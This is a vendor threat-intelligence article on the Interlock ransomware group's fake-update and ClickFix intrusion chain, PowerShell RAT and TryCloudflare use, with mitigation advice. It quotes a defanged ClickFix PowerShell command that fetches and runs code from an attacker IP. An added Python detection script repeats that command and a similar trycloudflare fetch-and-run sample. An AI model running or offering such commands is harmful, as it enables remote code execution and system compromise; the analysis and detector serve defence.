In the ransomware landscape of 2025, Interlock has started to make its presence known. Although it is a relatively new group, it has already positioned itself as an opportunistic actor that effectively exploits compromised websites and employs sophisticated social engineering tactics to distribute its malware.
First detected in September 2024, Interlock breaks away from the traditional Ransomware-as-a-Service (RaaS) model. Unlike other groups, it doesn’t rely on affiliates or promote its operations publicly. Instead, it operates in a more closed and direct manner, with campaigns designed to maximize financial gain. Its strategy? The well-known double extortion method: encrypting victims' data and threatening to expose it if the ransom isn’t paid.
To support this, the group uses its own infrastructure and a dedicated leak site called “Worldwide Secrets Blog,” where it publishes stolen information as a form of pressure.
In this article, we’ll explain how Interlock typically attacks, what makes it different, and most importantly, what you can do to protect your organization from this increasingly common threat.
Interlock Ransomware, also known in some circles as Nefarious Mantis, is one of the most active and concerning cybercriminal groups of 2025. Although it was first detected in September 2024, it has rapidly escalated within less than a year to become a high-level threat, particularly targeting key companies and organizations in North America and Europe.
During this short time, Interlock has attacked critical sectors such as education, healthcare, technology, and government agencies, taking advantage of environments where cybersecurity defenses are limited or outdated.
In fact, in June 2025, both the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert warning about the increase in Interlock’s activity. This made it clear that we’re no longer dealing with a fringe group but with a major player in the global ransomware scene.
Unlike many other well-known ransomware groups, Interlock does not follow the traditional Ransomware-as-a-Service (RaaS) model. It doesn’t recruit affiliates or advertise its tools. All signs point to a closed and highly organized group with a 100% financial motivation.
One of the most curious aspects of its operation is that it gains initial access through legitimate websites that have been compromised—an uncommon technique among ransomware actors. This method, known as drive-by download, is more typical of general malware campaigns, but Interlock has successfully incorporated it into its toolkit.
And that’s not all. In May 2025, they began using a social engineering technique called ClickFix, which tricks users into downloading malicious software under the impression that they’re resolving a technical issue on their devices. Subtle and dangerous.
Another interesting detail is that the payload (the software that encrypts files) often executes within virtual machines, reducing the risk of detection by traditional antivirus software. This also means that the primary systems (physical hosts) are often not directly affected, complicating early detection of the attack.
According to open-source reports, there are notable similarities between Interlock and Rhysida, another well-known ransomware group. While no official confirmation has been made, there is a possibility that Interlock may be a spinoff or evolution of Rhysida.
Even CISA has published information on Rhysida that may help better understand Interlock’s tactics. For now, this connection remains a hypothesis, but there’s no doubt the two groups share similar methods and objectives.
Interlock’s activity has increased significantly in recent months. Here are some of the most relevant attacks reported in 2025:
On July 22, 2025, the FBI and CISA issued a joint advisory noting that Interlock had upgraded its malware, making it more difficult to detect. Most concerning is that the group now uses encryptors designed for both Windows and Linux systems and has been seen encrypting virtual machines on both platforms.
This technological evolution suggests that Interlock is seriously investing in improving its tools and expanding its reach.
One of the most impactful incidents was the attack on DaVita, a major network of clinics specializing in kidney treatment. In this case, Interlock managed to steal 1.5 terabytes of sensitive data, affecting over 200,000 patients.
The leaked data included confidential medical information, sparking national concern over cybersecurity in the healthcare sector.
Another recent case was the attack on the city of St. Paul, where Interlock succeeded in disabling several critical municipal systems and endangered the personal data of at least 3,500 public employees.
Most strikingly, 10 days before the attack, cyber intelligence firm PRODAFT had already detected suspicious activity attributed to Interlock in the city’s systems. They even issued a public warning on X (formerly Twitter), citing a “high likelihood of spread.”
As of mid-August 2025, at least 58 organizations have been confirmed as victims, with their data published on Interlock’s leak site: the so-called “Worldwide Secrets Blog.” This portal is a key part of their double extortion strategy—if you don’t pay, your data goes public.
Interlock Leak Site: "Worldwide Secrets Blog"
One of the most concerning aspects of Interlock Ransomware is the silent and sophisticated way it infiltrates systems. Unlike louder or more obvious attacks, Interlock prefers to operate in the shadows, using techniques that mimic legitimate behavior and directly deceive the user.
Interlock relies on an approach that combines social engineering with a cybersecurity tactic known as Living off the Land (LOTL). What does that mean? Essentially, it uses legitimate tools and processes built into the operating system (such as PowerShell or software updates) to disguise its malicious activity and evade detection by traditional antivirus programs or endpoint security solutions.
The danger of this method lies in the fact that users often don’t realize they’re unknowingly assisting the attack. The malicious instructions are usually hosted on compromised websites that appear legitimate, creating a false sense of trust. That’s what makes the trap so easy to fall into.
The first phase of Interlock’s attack begins with fake software updates. Imagine visiting a seemingly normal website (possibly even one you trust) and seeing a message that says your browser (like Chrome or Edge) needs to be updated.
That so-called “update” is actually a tampered version, bundled with a tool like PyInstaller, designed to look like a legitimate installer. The user believes they’re installing a Google Chrome update, but in reality, a malicious script is executed that gives the attacker full access to the system.
When the user follows the instructions (e.g., clicks “Update Now”), the following occurs:
A real Chrome or Edge installer is launched as a decoy.
In the background, a malicious PowerShell script runs without the user noticing.
That script acts as a backdoor and communicates with the attackers’ command and control (C2) servers.
From there, the attacker can:
A key technique used by Interlock is called ClickFix. It’s a rather clever form of social engineering where attackers trick users into unknowingly executing malicious commands on their own systems.
The trick is to make the user believe they’re “fixing” something. For example, a pop-up might appear indicating a technical issue (like a failed update) and instruct the user to follow a series of steps to resolve it.
Here’s where the psychological manipulation kicks in: the site tells you to press “Windows + R” (to open the Windows “Run” dialog), then “CTRL + V” to paste a pre-copied command, and finally to press “Enter.”
What you’re actually doing at that moment is running a malicious PowerShell command that completely compromises your device.
The fake ClickFix updater dialog prompts users to manually execute the PowerShell command.
In addition to ClickFix, a variant called FileFix has been observed. It follows the same logic of exploiting user trust but with slight differences in its delivery method. Both techniques share a common goal: to trick the user into executing malicious code on their own, disguised as a legitimate solution to a non-existent problem.
ClickFix is not exclusive to Interlock. It has also been used in campaigns distributing:
Lumma Stealer (LummaC2)
AsyncRAT
DanaBot
DarkGate
This shows that the technique is popular among cybercriminal groups for one very simple reason: it works. And as long as it remains effective, we can expect to see more variants tailored to different campaigns and targets.
Once the user mistakenly executes the malicious command (usually tricked through a technique like ClickFix), a PowerShell backdoor is activated and begins operating very discreetly. There are no open windows or visible alerts. This backdoor simply runs in the background, restarting separately to avoid suspicion and bypass traditional monitoring tools.
Essentially, it begins communicating with remote servers controlled by the attackers—known as command and control (C2) servers—via HTTP requests. And in case one of these servers goes offline, there's a backup list of several domains and IP addresses to keep the connection alive.
One of the reasons this technique remains so effective is due to code obfuscation. In simple terms, attackers hide their actual commands under layers of tangled code that appear harmless or unreadable at first glance.
In recent campaigns—especially those using social engineering like ClickFix—a wide variety of PowerShell commands have been detected. All are specifically designed to bypass security systems that search for known patterns or keywords. The obfuscation techniques observed include:
Replacing letters with character codes.
Using symbols like +, *, and ? to scramble the code.
Wrapping malicious commands inside legitimate functions such as Invoke-RestMethod, Invoke-Expression, and aliases of these functions.
These malicious commands often include hidden URLs—some hosted on dangerous domains, others on legitimate services repurposed for malicious use, such as trycloudflare.com, or even direct IPv4 addresses that don’t raise immediate suspicion.
Once active, this malicious tool begins collecting critical information from the compromised system, including:
Operating system details
User privileges
Running processes and services
Network configurations
Before sending this information to the attackers’ server, the script obfuscates and compresses it to avoid detection by security tools.
Once the cybercriminals receive this data, the C2 server can issue new instructions, such as:
Downloading and installing malicious executables or DLLs
Executing custom commands
Expanding control within the compromised network
To maintain control and navigate within infected systems, Interlock commonly uses advanced and well-known tools from the cybercrime world, including:
Cobalt Strike – A penetration testing toolkit frequently repurposed by attackers.
Interlock RAT – Likely developed in-house by the group.
NodeSnake RAT – A remote access tool written in Node.js.
SystemBC – A platform used to conceal malicious traffic through proxy tunneling.
These tools not only facilitate covert communication but also enable attackers to move laterally across the network and launch further attacks from within.
PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"
Example of a Malicious PowerShell Script That Victims Are Tricked Into Executing
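As an added illustration for defenders (not code from this article or from Interlock's tooling), the Python below scores a PowerShell command line, taken from a process-creation event or a Run-key value, against the indicators described above: a hidden window, iex/irm and their aliases, raw IPv4 or trycloudflare.com URLs, character-code and string-concatenation tricks, the epoch-rounding stub seen in the command above, and explorer.exe as the parent (the Run dialog used by ClickFix). The weights, alert threshold and all sample command lines other than the one quoted from the article are assumptions constructed for this example.

```python
import re

# Indicator patterns drawn from the article's description of Interlock's
# ClickFix / PowerShell stage. Weights are an illustrative assumption; tune
# them against your own telemetry before using the threshold for alerting.
INDICATORS = [
    ("hidden_window",   re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"), 2),
    ("invoke_expr",     re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), 2),
    ("invoke_rest",     re.compile(r"(?i)\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b"), 1),
    ("raw_ipv4_url",    re.compile(r"(?i)(?:https?://)?\b(?:\d{1,3}\[?\.\]?){3}\d{1,3}(?::\d+)?/"), 2),
    ("trycloudflare",   re.compile(r"(?i)[a-z0-9-]+\.trycloudflare\.com"), 3),
    ("char_codes",      re.compile(r"(?i)\[char\]\s*\d+"), 2),
    ("string_concat",   re.compile(r"'[^']*'\s*\+\s*'[^']*'"), 1),
    ("epoch_rounding",  re.compile(r"(?i)\[datetime\]::UtcNow.*%\s*16\b"), 2),
    ("encoded_command", re.compile(r"(?i)\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 2),
]

# ClickFix has the user launch PowerShell from the Run dialog, so the
# parent process of the resulting powershell.exe is explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}


def score_command(cmdline, parent=None):
    """Return (score, matched indicator names) for one PowerShell command line.
    `parent` is the parent process image, or None for a registry Run value."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            hits.append(name)
    if parent and parent.lower() in RUN_DIALOG_PARENTS:
        score += 2
        hits.append("run_dialog_parent")
    return score, hits


def is_clickfix_like(cmdline, parent=None, threshold=5):
    """True when enough indicators co-occur to justify an alert (threshold is an assumption)."""
    return score_command(cmdline, parent)[0] >= threshold


# Constructed samples: the first mirrors the defanged command line quoted in
# the article; the others are hypothetical benign and persistence cases.
SAMPLES = [
    ("explorer.exe", 'PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/'
     "$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); "
     '$x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"'),
    ("svchost.exe", r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1'),
    ("cmd.exe", 'powershell.exe -c "Invoke-RestMethod https://api.example.com/v1/releases"'),
    # Hypothetical HKCU\...\Run value (no parent process): hidden window plus tunnel URL.
    (None, 'powershell -w hidden -c "iex (irm https://placeholder-words.trycloudflare.com/x)"'),
]

if __name__ == "__main__":
    for parent, cmd in SAMPLES:
        score, hits = score_command(cmd, parent)
        print(f"{score:2d} {'ALERT' if is_clickfix_like(cmd, parent) else 'ok   '} {hits}")
```

Feed it command lines from PowerShell script block logging, Sysmon process-creation events or an export of the Run keys; the ordinary admin scripts score at or near zero while the ClickFix-style and tunnel-backed commands clear the threshold.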
As Interlock has evolved, so has its ability to remain within systems once compromised. In the most recent versions of its malicious script (up to version 11), it has been observed establishing persistence through the Windows Registry.
This means that even if the system is rebooted or the user tries to clean the device, the malicious script can automatically relaunch and maintain its connection with the command and control servers.
One of Interlock’s smartest (and most concerning) tactics is how it leverages legitimate tools for malicious activities. Specifically, it abuses TryCloudflare, a Cloudflare Tunnel feature designed to easily create temporary tunnels without needing to set up a domain on Cloudflare.
Attackers use dynamically generated subdomains via TryCloudflare to hide their communications and avoid easy blocking. Because these addresses look legitimate and change constantly, tracing their origin or stopping their activity in time becomes extremely difficult.
These temporary domains act as proxies that channel malicious traffic, blending it with seemingly normal traffic to evade security filters.
One of the reasons Interlock Ransomware is gaining so much attention is due to how effectively it avoids detection. Not only does it strike stealthily, but it has also continued to refine its tools to bypass traditional security solutions.
Recently, it was confirmed that Interlock has added a custom Remote Access Trojan (RAT) to its arsenal, developed in PowerShell. This is no ordinary tool—it’s purpose-built to integrate into the early stages of the attack and enable remote control of the infected system.
How is it delivered? Through its now-familiar tactic: fake software updates that appear on compromised websites. The user thinks they’re installing something legitimate but are actually opening the door to this stealthy RAT.
Once inside the system, the PowerShell-based RAT runs in the background, showing no visible windows or alerts. This allows it to operate for days—or even weeks—without raising any suspicion.
This RAT has two primary functions:
Collect detailed system information (such as configurations, active processes, network details, user privileges, etc.).
Allow attackers to execute remote commands and download additional malicious payloads to advance the attack (such as encrypting files or moving laterally through the network).
All of this happens persistently, meaning it stays active even after the device is rebooted, making it difficult to remove.
When a threat like Interlock Ransomware emerges, there’s no time to waste. At TecnetOne, our Security Operations Center (SOC) is prepared to act as soon as we detect suspicious activity or active campaigns.
Instead of reacting too late, we work proactively. How? We continuously monitor the threat landscape, and when we identify something new—such as tactics, techniques, or indicators of compromise (IoCs) used by groups like Interlock—we immediately adjust our detection rules.
Thanks to our expertise and use of up-to-date threat intelligence, our team:
Detects attacks in early stages (before they become a full-blown crisis).
Strengthens each client’s security in a personalized way.
Implements new defenses in real time.
And this isn’t a one-time effort. As new variants or behaviors emerge, we continuously improve our detections to cover every angle attackers might exploit.
In short: While others are discovering the attack too late, we’re already blocking it.
Interlock isn’t new, but its activity throughout 2025 has made it a threat that can no longer be ignored. Just this year, it has already triggered official warnings from the FBI and CISA, and its attack on the city of Saint Paul made it clear that the group is raising the stakes—targeting bigger victims with the expectation of higher ransom payouts, regardless of whether they compromise critical infrastructure.
This group doesn’t just encrypt files. It uses malware like Interlock RAT, infiltrates through compromised websites, and constantly adapts. Their objective is clear: impact, pressure, and fast profits.
There’s no silver bullet to completely stop Interlock, but there are many effective measures you can implement today. Here are the most important ones:
Prevent Initial Access: Use firewalls that filter DNS and web traffic, and train your team to spot phishing attempts and fake software updates.
Block Malicious Tunnels: If you’re not using services like TryCloudflare for legitimate operations, block their domains on your network.
Apply Security Patches: Keep your OS, software, and firmware fully updated. Outdated vulnerabilities remain attackers’ favorite targets.
Segment Your Network: Divide your infrastructure to limit damage if a device is compromised.
Manage Identities and Access: Enforce strong policies for user, credential, and permission management across your organization.
Have an Incident Response Plan Ready: Ensure you have a specialized team or provider prepared to act swiftly if something goes wrong.
Implement an EDR Solution: Tools like TecnetProtect don’t just detect hidden signs of attack—they can stop intrusions before the attackers gain control.
Enable Multi-Factor Authentication (MFA): Especially for corporate email, VPNs, and any critical system.
Engage a SOC for Continuous Monitoring: Having a 24/7 SOC like TecnetOne’s gives you real-time visibility into your network activity. This allows you to detect threats before they act and respond without delay.